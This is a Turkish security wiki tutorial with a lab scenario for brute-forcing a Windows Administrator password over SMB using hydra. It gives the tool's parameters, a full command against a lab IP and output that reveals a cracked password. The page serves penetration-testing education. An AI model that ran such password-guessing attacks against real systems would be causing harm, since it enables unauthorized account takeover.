Windows Hesaplarını SMB Üzerinden Bruteforce ile Ele Geçirme

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Windows işletim sistemlerinde bir kullanıcının sistem üzerinde herhangi bir işlem yapmadan önce sisteme giriş yapması gerekmektedir. Kullanıcıların sisteme girişi SMB protoklü üzerinden gerçekleştirilmektedir. Windows sistemlerde varsayılan olarak kullanıcılar SMB protokolü üzerinden uzaktan da erişim elde edebilmektedirler. Windows 7 ve öncesi sistemler için kullanıcı adı ve parolası elde edilen sistemlerin komut satırlarına uzaktan erişilebilmektedir. Tüm dosya sistemleri uzaktan kontrol edilebilmektedir.

Araç:

  • hydra

Lab Senaryosu:

Saldırı aracı olarak hydra kullanılacaktır. Hedef sistemin oturum giriş bilgileri uzaktan elde edilmeye çalışılacaktır.

Kullanıcı adı bilinen bir sistemde denenecek bir parola için kullanımı;

hydra –l kullanıcıAdı –p kullanıcıParolası protokol://hedefIPAdresi

En sık kullanılan hydra parametreleri:

-l: parametresi ile bilinen bir kullanıcı adı denenmesi için verilir
-L: parametresi ile içerisinde kullanıcı listesi bulunan dosya referans gösterilir
-p: parametresi ile bilinen bir parola değeri denemesi için verilir
-P: parametresi ile içerisinde parola listesi bulunduran dosyanın referans gösterilir.
-C: parametresi kullanıcı Adı/parola değerlerini arada “:” bulunacak şekilde barındıran bir dosyanın referans verilmesi için kullanılır.
-M: parametresi saldırı için kullanılacak IP adreslerini barındıran dosyanın referans verilmesi için kullanılır.
-t: hedef sisteme aynı anda kaç isteğin gönderileceğini belirleyen parametredir. (varsayılan değer:16)

Bu uygulamada hedef sistemin IP adresi 192.168.20.108 dir. Hedef sistemde oturum bilgilerini ele geçirmek için kullanılacak kullanıcı adı Administrator’dür.

Bu uygulama için hydra kullanımı ve çıktısı aşağıda verilmiştir:

root@kali:~/Desktop# hydra -l administrator -P wordlist.txt smb://192.168.20.108
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-03 09:09:17
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] 1 task, 1 server, 101 login tries (l:1/p:101), ~101 tries per task
[DATA] attacking service smb on port 445
[445][smb] host: 192.168.20.108   login: administrator   password: 123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-03 09:09:18

Burada kullanılan parametreler:

-l: kullanıcı adını
-P: parolaların bulunduğu dosyayı 

smb://192.168.20.108: Hedef sisteme SMB protokolü üzerinden denemeler yapılacağını göstermektedir.